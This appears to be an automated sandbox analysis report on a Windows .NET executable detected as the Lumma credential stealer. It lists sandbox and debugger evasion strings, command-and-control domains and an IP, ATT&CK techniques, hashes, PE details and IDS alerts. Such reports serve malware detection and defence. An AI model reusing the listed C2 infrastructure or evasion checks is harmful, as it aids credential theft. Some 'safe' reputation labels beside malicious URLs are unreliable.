                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: 3vLKNycnrz.exe PID: 7360, type: MEMORYSTR
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeMemory allocated: 31F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeMemory allocated: 3460000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeMemory allocated: 31F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exe TID: 7484Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: 3vLKNycnrz.exe, 00000002.00000002.1443006164.00000000013FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@mD
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: 3vLKNycnrz.exe, 00000002.00000002.1443084110.0000000001437000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: 3vLKNycnrz.exe, 00000002.00000002.1443084110.0000000001437000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 0_2_03291320 CheckRemoteDebuggerPresent,0_2_03291320
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeCode function: 2_2_0043A5B0 LdrInitializeThunk,2_2_0043A5B0
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: debonairnukk.xyz
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: diffuculttan.xyz
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: effecterectz.xyz
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: deafeninggeh.biz
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: immureprech.biz
                    Source: 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: peelyitemsn.click
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeProcess created: C:\Users\user\Desktop\3vLKNycnrz.exe "C:\Users\user\Desktop\3vLKNycnrz.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeQueries volume information: C:\Users\user\Desktop\3vLKNycnrz.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3vLKNycnrz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		11
                    Process Injection                    		3
                    Virtualization/Sandbox Evasion                    		OS Credential Dumping211
                    Security Software Discovery                    		Remote Services11
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    PowerShell                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		1
                    Disable or Modify Tools                    		LSASS Memory3
                    Virtualization/Sandbox Evasion                    		Remote Desktop Protocol2
                    Clipboard Data                    		2
                    Non-Application Layer Protocol                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		11
                    Process Injection                    		Security Account Manager1
                    Process Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive113
                    Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Deobfuscate/Decode Files or Information                    		NTDS12
                    System Information Discovery                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
                    Obfuscated Files or Information                    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Software Packing                    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581190 Sample: 3vLKNycnrz.exe Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 13 peelyitemsn.click 2->13 17 Suricata IDS alerts for network traffic 2->17 19 Found malware configuration 2->19 21 Multi AV Scanner detection for submitted file 2->21 23 8 other signatures 2->23 7 3vLKNycnrz.exe 2 2->7         started        signatures3 process4 signatures5 25 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->25 27 LummaC encrypted strings found 7->27 29 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 7->29 10 3vLKNycnrz.exe 7->10         started        process6 dnsIp7 15 peelyitemsn.click 104.21.62.151, 443, 49706, 49707 CLOUDFLARENETUS United States 10->15

                    Screenshots

                    Download Video

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    3vLKNycnrz.exe57%VirustotalBrowse
                    3vLKNycnrz.exe53%ReversingLabsWin32.Trojan.Lumma
                    3vLKNycnrz.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://peelyitemsn.click/api0%Avira URL Cloudsafe
                    https://peelyitemsn.click/C0%Avira URL Cloudsafe
                    https://peelyitemsn.click/api60%Avira URL Cloudsafe
                    https://peelyitemsn.click/0%Avira URL Cloudsafe
                    https://peelyitemsn.click/.0%Avira URL Cloudsafe
                    peelyitemsn.click0%Avira URL Cloudsafe

                    Domains and IPs

                    Download Network PCAP: filteredfull

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    peelyitemsn.click
                    		104.21.62.151
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://peelyitemsn.click/apitrue
                      • Avira URL Cloud: safe
                      		unknown
                      sordid-snaked.cyoufalse
                        		high
                        diffuculttan.xyzfalse
                          		high
                          effecterectz.xyzfalse
                            		high
                            peelyitemsn.clicktrue
                            • Avira URL Cloud: safe
                            		unknown
                            awake-weaves.cyoufalse
                              		high
                              immureprech.bizfalse
                                		high
                                wrathful-jammy.cyoufalse
                                  		high
                                  deafeninggeh.bizfalse
                                    		high
                                    debonairnukk.xyzfalse
                                      		high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://peelyitemsn.click/C3vLKNycnrz.exe, 00000002.00000002.1443084110.000000000140F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.com/mgravell/protobuf-neti3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://stackoverflow.com/q/14436606/233543vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/mgravell/protobuf-netJ3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://stackoverflow.com/q/11564914/23354;3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://stackoverflow.com/q/2152978/233543vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://peelyitemsn.click/api63vLKNycnrz.exe, 00000002.00000002.1443084110.000000000140F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://github.com/mgravell/protobuf-net3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000048C2000.00000004.00000800.00020000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1431335377.00000000062D0000.00000004.08000000.00040000.00000000.sdmp, 3vLKNycnrz.exe, 00000000.00000002.1420534008.00000000044C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name3vLKNycnrz.exe, 00000000.00000002.1411982462.0000000003461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://peelyitemsn.click/3vLKNycnrz.exe, 00000002.00000002.1443084110.0000000001437000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://peelyitemsn.click/.3vLKNycnrz.exe, 00000002.00000002.1443084110.0000000001437000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    104.21.62.151
                                                    		peelyitemsn.clickUnited States
                                                    		13335CLOUDFLARENETUStrue

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1581190
                                                    Start date and time:2024-12-27 08:12:09 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 4m 6s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:3
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:3vLKNycnrz.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:78b4d3e1df367155161b0ca24d08b157.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@3/0@1/1
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 90%
                                                    • Number of executed functions: 95
                                                    • Number of non-executed functions: 76
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Stop behavior analysis, all processes terminated
                                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    02:13:07API Interceptor1x Sleep call for process: 3vLKNycnrz.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    104.21.62.151appbase.dllGet hashmaliciousUnknownBrowse
                                                      Xerox-6509.dllGet hashmaliciousUnknownBrowse

                                                        Domains

                                                        No context

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        CLOUDFLARENETUSinstaller.batGet hashmaliciousVidarBrowse
                                                        • 172.64.41.3
                                                        skript.batGet hashmaliciousVidarBrowse
                                                        • 162.159.61.3
                                                        din.exeGet hashmaliciousVidarBrowse
                                                        • 172.64.41.3
                                                        lem.exeGet hashmaliciousVidarBrowse
                                                        • 172.64.41.3
                                                        markiz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                        • 104.26.13.205
                                                        utkin.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                        • 172.67.74.152
                                                        0Gs0WEGB1E.dllGet hashmaliciousUnknownBrowse
                                                        • 104.21.22.88
                                                        Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.80.1
                                                        NewI Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                        • 172.67.190.223
                                                        setup.exeGet hashmaliciousLummaCBrowse
                                                        • 172.67.197.192

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        a0e9f5d64349fb13191bc781f81f42e1Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.62.151
                                                        NewI Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.62.151
                                                        setup.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.62.151
                                                        exlauncher-unpadded.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.62.151
                                                        atw3.dllGet hashmaliciousGozi, UrsnifBrowse
                                                        • 104.21.62.151
                                                        installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                        • 104.21.62.151
                                                        0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.62.151
                                                        cqHMm0ykDG.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.62.151
                                                        pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.62.151
                                                        GxX48twWHA.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.62.151

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        No created / dropped files found

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.807765755196678
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Windows Screen Saver (13104/52) 0.07%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        File name:3vLKNycnrz.exe
                                                        File size:3'635'712 bytes
                                                        MD5:78b4d3e1df367155161b0ca24d08b157
                                                        SHA1:e0b63eb3c6858c7cb8e3754b67264b8a861b1d86
                                                        SHA256:10c9f5d51b36a62a32560a1e9912a28c781f9723fa23c2f778a86e8e94aef2fb
                                                        SHA512:d78bbd14cfd7b6af5f13e8d40072963d36a2d9059e586d3837e476f25d458056d44ff3a25713139f83d7f550861c213dc9ac7a1e18335069f10d656380ed4a06
                                                        SSDEEP:98304:E3CrFD9UPyyHBhwPFiVupq1ME+2KPv193iD:E38B948FB6M2KHji
                                                        TLSH:A2F5F1B4AFEC9FC4E77C667EC3E128355139905818B7E32729485ABC0549BB0E38D61E
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2ag.................p7...........7.. ........@.. ........................7...........`................................

                                                        File Icon

                                                        Icon Hash:00928e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x778dfe
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6761321C [Tue Dec 17 08:11:08 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        aaa
                                                        test dword ptr [ecx], ebx
                                                        rol byte ptr [eax], 1
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x378dac0x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x37a0000x600.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x37c0000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x376e080x3770002c7f957da1b8f2dbce38b2a8835b1272unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x37a0000x6000x6009edb7b38ba1086eb179db3a2760060deFalse0.408203125data3.986737529851491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x37c0000xc0x2004304d922d1d1d01b3bcd855cce4612afFalse0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_VERSION0x37a0a00x2ecdata0.4344919786096257
                                                        RT_MANIFEST0x37a38c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Download Network PCAP: filteredfull

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-12-27T08:13:07.399283+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706104.21.62.151443TCP
                                                        2024-12-27T08:13:08.134997+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849706104.21.62.151443TCP
                                                        2024-12-27T08:13:08.134997+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849706104.21.62.151443TCP
                                                        2024-12-27T08:13:09.017586+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707104.21.62.151443TCP

                                                        Network Port Distribution

                                                        • Total Packets: 15
                                                        • 443 (HTTPS)
                                                        • 53 (DNS)
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 27, 2024 08:13:05.765031099 CET49706443192.168.2.8104.21.62.151
                                                        Dec 27, 2024 08:13:05.765065908 CET44349706104.21.62.151192.168.2.8
                                                        Dec 27, 2024 08:13:05.765147924 CET49706443192.168.2.8104.21.62.151
                                                        Dec 27, 2024 08:13:05.771680117 CET49706443192.168.2.8104.21.62.151
                                                        Dec 27, 2024 08:13:05.771692038 CET44349706104.21.62.151192.168.2.8
                                                        Dec 27, 2024 08:13:07.399205923 CET44349706104.21.62.151192.168.2.8
                                                        Dec 27, 2024 08:13:07.399282932 CET49706443192.168.2.8104.21.62.151
                                                        Dec 27, 2024 08:13:07.402235985 CET49706443192.168.2.8104.21.62.151
                                                        Dec 27, 2024 08:13:07.402241945 CET44349706104.21.62.151192.168.2.8
                                                        Dec 27, 2024 08:13:07.402578115 CET44349706104.21.62.151192.168.2.8
                                                        Dec 27, 2024 08:13:07.446098089 CET49706443192.168.2.8104.21.62.151
                                                        Dec 27, 2024 08:13:07.455682039 CET49706443192.168.2.8104.21.62.151
                                                        Dec 27, 2024 08:13:07.455781937 CET49706443192.168.2.8104.21.62.151
                                                        Dec 27, 2024 08:13:07.455791950 CET44349706104.21.62.151192.168.2.8
                                                        Dec 27, 2024 08:13:08.134979010 CET44349706104.21.62.151192.168.2.8
                                                        Dec 27, 2024 08:13:08.135082006 CET44349706104.21.62.151192.168.2.8
                                                        Dec 27, 2024 08:13:08.135171890 CET49706443192.168.2.8104.21.62.151
                                                        Dec 27, 2024 08:13:08.137268066 CET49706443192.168.2.8104.21.62.151
                                                        Dec 27, 2024 08:13:08.137281895 CET44349706104.21.62.151192.168.2.8
                                                        Dec 27, 2024 08:13:08.148371935 CET49707443192.168.2.8104.21.62.151
                                                        Dec 27, 2024 08:13:08.148425102 CET44349707104.21.62.151192.168.2.8
                                                        Dec 27, 2024 08:13:08.148494959 CET49707443192.168.2.8104.21.62.151
                                                        Dec 27, 2024 08:13:08.148742914 CET49707443192.168.2.8104.21.62.151
                                                        Dec 27, 2024 08:13:08.148761988 CET44349707104.21.62.151192.168.2.8
                                                        Dec 27, 2024 08:13:09.017585993 CET49707443192.168.2.8104.21.62.151
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 27, 2024 08:13:05.187879086 CET5177953192.168.2.81.1.1.1
                                                        Dec 27, 2024 08:13:05.507018089 CET53517791.1.1.1192.168.2.8

